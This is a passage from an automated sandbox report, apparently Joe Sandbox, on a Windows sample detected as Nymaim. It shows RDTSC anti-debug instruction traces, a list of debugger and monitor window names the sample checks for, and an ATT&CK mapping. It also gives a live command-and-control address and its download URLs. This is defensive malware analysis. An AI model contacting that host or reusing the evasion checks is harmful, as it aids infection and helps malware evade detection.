      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A008B8 second address: 4A008F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC7C474F63Ah 0x00000009 or ah, FFFFFF98h 0x0000000c jmp 00007FC7C474F63Bh 0x00000011 popfd 0x00000012 mov si, DA4Fh 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov eax, dword ptr [ebx+0000008Ch] 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FC7C474F641h 0x00000026 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A008F5 second address: 4A008FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A008FB second address: 4A008FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A008FF second address: 4A00923 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+34h], eax 0x0000000b pushad 0x0000000c push edi 0x0000000d mov di, ax 0x00000010 pop esi 0x00000011 push edi 0x00000012 mov bl, al 0x00000014 pop edx 0x00000015 popad 0x00000016 mov eax, dword ptr [ebx+18h] 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c movsx edx, cx 0x0000001f mov ax, C0A5h 0x00000023 popad 0x00000024 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00923 second address: 4A00995 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C474F63Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+38h], eax 0x0000000c jmp 00007FC7C474F646h 0x00000011 mov eax, dword ptr [ebx+1Ch] 0x00000014 jmp 00007FC7C474F640h 0x00000019 mov dword ptr [esi+3Ch], eax 0x0000001c jmp 00007FC7C474F640h 0x00000021 mov eax, dword ptr [ebx+20h] 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007FC7C474F63Eh 0x0000002b add al, 00000078h 0x0000002e jmp 00007FC7C474F63Bh 0x00000033 popfd 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00995 second address: 4A009C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C5219A62h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esi+40h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC7C5219A67h 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A009C8 second address: 4A00A08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 0ACE85AAh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d lea eax, dword ptr [ebx+00000080h] 0x00000013 jmp 00007FC7C474F647h 0x00000018 push 00000001h 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FC7C474F640h 0x00000023 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00A08 second address: 4A00A0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00A0E second address: 4A00A6D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C474F63Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007FC7C474F640h 0x0000000f push eax 0x00000010 pushad 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop ebx 0x00000014 pop eax 0x00000015 popad 0x00000016 nop 0x00000017 jmp 00007FC7C474F642h 0x0000001c lea eax, dword ptr [ebp-10h] 0x0000001f jmp 00007FC7C474F640h 0x00000024 nop 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FC7C474F63Ah 0x0000002e rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00A6D second address: 4A00A73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00A73 second address: 4A00AC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C474F63Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov ax, bx 0x0000000e pushfd 0x0000000f jmp 00007FC7C474F63Dh 0x00000014 or eax, 3E465406h 0x0000001a jmp 00007FC7C474F641h 0x0000001f popfd 0x00000020 popad 0x00000021 nop 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FC7C474F63Dh 0x00000029 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00B3F second address: 4A00B93 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C5219A61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FC8356185C5h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FC7C5219A63h 0x00000018 add esi, 2C90AD6Eh 0x0000001e jmp 00007FC7C5219A69h 0x00000023 popfd 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00B93 second address: 4A00B98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00B98 second address: 4A00BEC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C5219A67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp-0Ch] 0x0000000c pushad 0x0000000d pushad 0x0000000e call 00007FC7C5219A62h 0x00000013 pop eax 0x00000014 mov ch, bl 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 pushfd 0x0000001a jmp 00007FC7C5219A5Ah 0x0000001f sub cx, 6E78h 0x00000024 jmp 00007FC7C5219A5Bh 0x00000029 popfd 0x0000002a rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00BEC second address: 4A00BFD instructions: 0x00000000 rdtsc 0x00000002 movzx esi, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov dword ptr [esi+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00BFD second address: 4A00C01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00C01 second address: 4A00C05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00C05 second address: 4A00C0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00C0B second address: 4A00C40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 17B688D8h 0x00000008 jmp 00007FC7C474F641h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 lea eax, dword ptr [ebx+78h] 0x00000013 jmp 00007FC7C474F63Eh 0x00000018 push 00000001h 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00C40 second address: 4A00C46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00C46 second address: 4A00C55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7C474F63Bh 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00C55 second address: 4A00C8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C5219A69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c pushad 0x0000000d mov di, cx 0x00000010 mov edi, esi 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FC7C5219A60h 0x0000001b rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00C8F second address: 4A00CA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C474F63Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov bh, 4Ch 0x0000000f mov bl, ch 0x00000011 popad 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00CA7 second address: 4A00D19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC7C5219A64h 0x00000009 and eax, 7FE95CB8h 0x0000000f jmp 00007FC7C5219A5Bh 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FC7C5219A68h 0x0000001b or esi, 25119718h 0x00000021 jmp 00007FC7C5219A5Bh 0x00000026 popfd 0x00000027 popad 0x00000028 pop edx 0x00000029 pop eax 0x0000002a lea eax, dword ptr [ebp-08h] 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FC7C5219A65h 0x00000034 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00D19 second address: 4A00D29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7C474F63Ch 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00D29 second address: 4A00D2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00DBF second address: 4A00DC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00DC4 second address: 4A00DDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bx, ED72h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007FC835618340h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00DDB second address: 4A00DDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00DDF second address: 4A00DF1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C5219A5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00DF1 second address: 4A00DF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00DF7 second address: 4A00DFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00DFB second address: 4A00E8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C474F63Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e jmp 00007FC7C474F63Eh 0x00000013 mov dword ptr [esi+08h], eax 0x00000016 jmp 00007FC7C474F640h 0x0000001b lea eax, dword ptr [ebx+70h] 0x0000001e jmp 00007FC7C474F640h 0x00000023 push 00000001h 0x00000025 jmp 00007FC7C474F640h 0x0000002a nop 0x0000002b jmp 00007FC7C474F640h 0x00000030 push eax 0x00000031 jmp 00007FC7C474F63Bh 0x00000036 nop 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007FC7C474F645h 0x0000003e rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00E8C second address: 4A00E92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00E92 second address: 4A00E96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00E96 second address: 4A00E9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00E9A second address: 4A00EAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-18h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00EAB second address: 4A00EAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00EAF second address: 4A00EBF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C474F63Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00EBF second address: 4A00F02 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C5219A5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b push esi 0x0000000c pushfd 0x0000000d jmp 00007FC7C5219A5Bh 0x00000012 add al, FFFFFFAEh 0x00000015 jmp 00007FC7C5219A69h 0x0000001a popfd 0x0000001b pop ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e mov edi, 03F28AC2h 0x00000023 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00F02 second address: 4A00F41 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FC7C474F643h 0x00000008 and ecx, 209B59BEh 0x0000000e jmp 00007FC7C474F649h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00F41 second address: 4A00F4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ax, 43FFh 0x00000008 popad 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00F4A second address: 4A00F73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C474F645h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC7C474F63Dh 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00F73 second address: 4A00F78 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00FB4 second address: 4A00FD6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C474F642h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FC834B4DD1Bh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
      Tries to evade debugger and weak emulator (self modifying code)
      Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 646B8B instructions caused by: Self-modifying code
      Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 624E57 instructions caused by: Self-modifying code
      Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
      Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
      Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
      Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 792Jump to behavior
      Source: C:\Users\user\Desktop\file.exe TID: 7564Thread sleep count: 59 > 30Jump to behavior
      Source: C:\Users\user\Desktop\file.exe TID: 7564Thread sleep time: -118059s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\file.exe TID: 7568Thread sleep count: 58 > 30Jump to behavior
      Source: C:\Users\user\Desktop\file.exe TID: 7568Thread sleep time: -116058s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\file.exe TID: 7528Thread sleep count: 174 > 30Jump to behavior
      Source: C:\Users\user\Desktop\file.exe TID: 7528Thread sleep count: 190 > 30Jump to behavior
      Source: C:\Users\user\Desktop\file.exe TID: 7528Thread sleep count: 176 > 30Jump to behavior
      Source: C:\Users\user\Desktop\file.exe TID: 7528Thread sleep count: 190 > 30Jump to behavior
      Source: C:\Users\user\Desktop\file.exe TID: 7540Thread sleep count: 792 > 30Jump to behavior
      Source: C:\Users\user\Desktop\file.exe TID: 7540Thread sleep time: -1584792s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\file.exe TID: 7528Thread sleep count: 194 > 30Jump to behavior
      Source: C:\Users\user\Desktop\file.exe TID: 7528Thread sleep count: 87 > 30Jump to behavior
      Source: C:\Users\user\Desktop\file.exe TID: 7528Thread sleep count: 79 > 30Jump to behavior
      Source: C:\Users\user\Desktop\file.exe TID: 7528Thread sleep count: 79 > 30Jump to behavior
      Source: C:\Users\user\Desktop\file.exe TID: 7528Thread sleep count: 80 > 30Jump to behavior
      Source: C:\Users\user\Desktop\file.exe TID: 7636Thread sleep time: -36000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\file.exe TID: 7552Thread sleep count: 53 > 30Jump to behavior
      Source: C:\Users\user\Desktop\file.exe TID: 7552Thread sleep time: -106053s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\file.exe TID: 7544Thread sleep time: -42021s >= -30000sJump to behavior
      Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
      Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

      Anti Debugging

      barindex
      Found potential dummy code loops (likely to delay analysis)
      Source: C:\Users\user\Desktop\file.exeProcess Stats: CPU usage > 42% for more than 60s
      Hides threads from debuggers
      Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
      Tries to detect sandboxes and other dynamic analysis tools (window names)
      Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
      Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
      Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
      Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
      Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
      Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
      Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
      Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
      Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
      Source: C:\Users\user\Desktop\file.exeFile opened: SICE
      Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
      Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
      Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected

      Stealing of Sensitive Information

      barindex
      Yara detected Nymaim
      Source: Yara matchFile source: 0.3.file.exe.4a30000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000000.00000003.1660929409.0000000004A30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
      DLL Side-Loading      		1
      DLL Side-Loading      		341
      Virtualization/Sandbox Evasion      		OS Credential Dumping73
      Security Software Discovery      		Remote ServicesData from Local System1
      Non-Application Layer Protocol      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts2
      Software Packing      		LSASS Memory341
      Virtualization/Sandbox Evasion      		Remote Desktop ProtocolData from Removable Media11
      Application Layer Protocol      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
      DLL Side-Loading      		Security Account Manager1
      Process Discovery      		SMB/Windows Admin SharesData from Network Shared Drive1
      Ingress Tool Transfer      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Obfuscated Files or Information      		NTDS1
      Application Window Discovery      		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets22
      System Information Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      file.exe34%ReversingLabsWin32.Infostealer.Tinba
      file.exe100%Joe Sandbox ML

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      No Antivirus matches

      Domains and IPs

      Contacted Domains

      No contacted domains info

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubfalse
        		high

        World Map of Contacted IPs

        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs

        Public IPs

        IPDomainCountryFlagASNASN NameMalicious
        185.156.72.65
        		unknownRussian Federation
        		44636ITDELUXE-ASRUtrue

        General Information

        Joe Sandbox version:41.0.0 Charoite
        Analysis ID:1565668
        Start date and time:2024-11-30 14:04:05 +01:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 6m 49s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:5
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Sample name:file.exe
        Detection:MAL
        Classification:mal100.troj.evad.winEXE@1/0@0/1
        EGA Information:Failed
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 0
        • Number of non-executed functions: 0
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Override analysis time to 240000 for current running targets taking high CPU consumption

        Warnings

        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
        • Not all processes where analyzed, report is missing behavior information
        • VT rate limit hit for: file.exe

        Simulations

        Behavior and APIs

        TimeTypeDescription
        08:05:24API Interceptor11361741x Sleep call for process: file.exe modified

        Joe Sandbox View / Context

        IPs

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        185.156.72.65file.exeGet hashmaliciousNymaimBrowse
        • 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
        file.exeGet hashmaliciousNymaimBrowse
        • 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
        file.exeGet hashmaliciousNymaimBrowse
        • 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
        file.exeGet hashmaliciousAmadey, NymaimBrowse
        • 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
        file.exeGet hashmaliciousNymaimBrowse
        • 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
        file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Nymaim, Stealc, VidarBrowse
        • 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
        file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, StealcBrowse
        • 185.156.72.65/soft/download
        file.exeGet hashmaliciousNymaimBrowse
        • 185.156.72.65/soft/download
        file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
        • 185.156.72.65/files/download
        file.exeGet hashmaliciousNymaimBrowse
        • 185.156.72.65/soft/download

        Domains

        No context

        ASNs

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        ITDELUXE-ASRUfile.exeGet hashmaliciousNymaimBrowse
        • 185.156.72.65
        file.exeGet hashmaliciousNymaimBrowse
        • 185.156.72.65
        file.exeGet hashmaliciousNymaimBrowse
        • 185.156.72.65
        file.exeGet hashmaliciousAmadey, NymaimBrowse
        • 185.156.72.65
        file.exeGet hashmaliciousNymaimBrowse
        • 185.156.72.65
        file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Nymaim, Stealc, VidarBrowse
        • 185.156.72.65
        file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, StealcBrowse
        • 185.156.72.65
        file.exeGet hashmaliciousNymaimBrowse
        • 185.156.72.65
        file.exeGet hashmaliciousNymaimBrowse
        • 185.156.72.65
        file.exeGet hashmaliciousNymaimBrowse
        • 185.156.72.65

        JA3 Fingerprints

        No context

        Dropped Files

        No context

        Created / dropped Files

        No created / dropped files found

        Static File Info

        General

        File type:PE32 executable (GUI) Intel 80386, for MS Windows
        Entropy (8bit):7.947656894539058
        TrID:
        • Win32 Executable (generic) a (10002005/4) 99.96%
        • Generic Win/DOS Executable (2004/3) 0.02%
        • DOS Executable Generic (2002/1) 0.02%
        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
        File name:file.exe
        File size:2'021'888 bytes
        MD5:7b58f626a6acdca919aaae907585b8c0
        SHA1:9e81feb90f37e4b80ab06846a5044330d616b748
        SHA256:e57a172afd44d0e2225c849de5f6e8c2a68e263e371547b2d3f4ba951dccbc00
        SHA512:18811d4ceb94cc6014e3eb055966b7556dbb4ff649652982554af310173ef25eb485a3db766ee91aa3b824bd437679854c9bbc3b86ff1f1d1010bbc00d91b429
        SSDEEP:49152:F4Z9zLjA0m8tW33v4p1Hru40kubUcUFb6AjeBSG:F4ZJ68c33v4vHrh0iTb6AK
